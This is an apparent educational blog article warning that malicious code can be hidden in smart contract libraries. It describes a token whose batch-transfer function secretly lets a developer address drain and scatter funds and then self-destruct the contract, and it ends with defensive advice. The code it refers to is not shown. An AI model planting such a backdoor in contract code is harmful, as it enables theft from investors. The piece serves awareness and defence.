Why we should be aware of the hiding malicious code in smart contracts
how they hide malicious code and how they can use malicious code to exploit
What is malicious code?
Malicious code is unwanted files or programs that can cause harm to a computer or compromise data stored on a computer. Various classifications of malicious code include viruses, worms, and Trojan horses.
- Viruses have the ability to damage or destroy files on a computer system and are spread by sharing already infected removable media, opening malicious email attachments, and visiting malicious web pages.
- Worms are a type of virus that self-propagates from computer to computer. Its functionality is to use all of your computer’s resources, which can cause your computer to stop responding.
- Trojan Horses are computer programs that are hiding a virus or a potentially damaging program. It is not uncommon that free software contains a Trojan horse making a user think they are using legitimate software, instead the program is performing malicious actions on your computer.
- Malicious data files are non-executable files — such as a Microsoft Word document, an Adobe PDF, a ZIP file, or an image file — that exploit weaknesses in the software program used to open it. Attackers frequently use malicious data files to install malware on a victim’s system, commonly distributing the files via email, social media, and websites.
credit: CISA
Malicious code can also appear on smart contracts. There are multiple ways to hide the unusual behaviors from the people on the blockchain network. In this article, we will show you one of the common methods injected/modified in third-party libraries.
Can you spot unusual in the code below?
From the above contract code, it looks fairly fine, isn’t it? If you see at line 20 in the Crowsale contract, it approves only the accepted token for the Crowdsale token which is a bit weird but if you move to the MyToken contract, all those things look perfectly usual, and nothing wrong. It’s very cleaned and intelligible. But anyway, you can hide your malicious code inside the third-party contract libraries. Let’s go to workshops and see how it’s possible.
Workshop Walkthrough
# clone the repository
git clone https://github.com/MASDXI/malicious-crowdsale-contract.git# install dependencies
yarn install
For running exploit in sequence, the first step you need to start is a local development network or local test net to run the script.
How is it possible? that code looks fine! That is something. I won’t tell you before. the MyToken contract is ERC20 but extended batch transfer function and this batch transfer is not an ordinary batch transfer. It has the condition for rug pull if it’s called by the address of the malicious; moreover, malicious developers can also create pseudo-anonymous by distributing the fund to any address that’s their want. As you will see in the code below. After transferring funds maliciously, they can also trigger the self-destruct of the MyToken contract. For learning more about it https://docs.soliditylang.org/en/v0.8.13/introduction-to-smart-contracts.html#deactivate-and-self-destruct
In this case example, the crowd-sale smart contract has been injected malicious code inside a library contract. If we assume that MyToken is selling NFT ERC721 or ERC1155 instead of ERC20, it would be such a pain for the investors and venture capitals.
Conclusion
- Trusted library contracts can be modified or overwritten by Malicious developers. You must ensure that they DO NOT include any unusual stuff inside in contract libraries.
- The malicious developers can manipulate smart contracts that include malicious code.
- Avoiding/Aware of interacting with un-verified smart contracts.
Further reading
- https://www.scitepress.org/Papers/2020/89098/89098.pdf
- https://solidity-by-example.org/hacks/hiding-malicious-code-with-external-contract/
Contents distributed by Learn.Block6.tech
👉 Discord — Live Talks
👉 Twitter — Latest articles
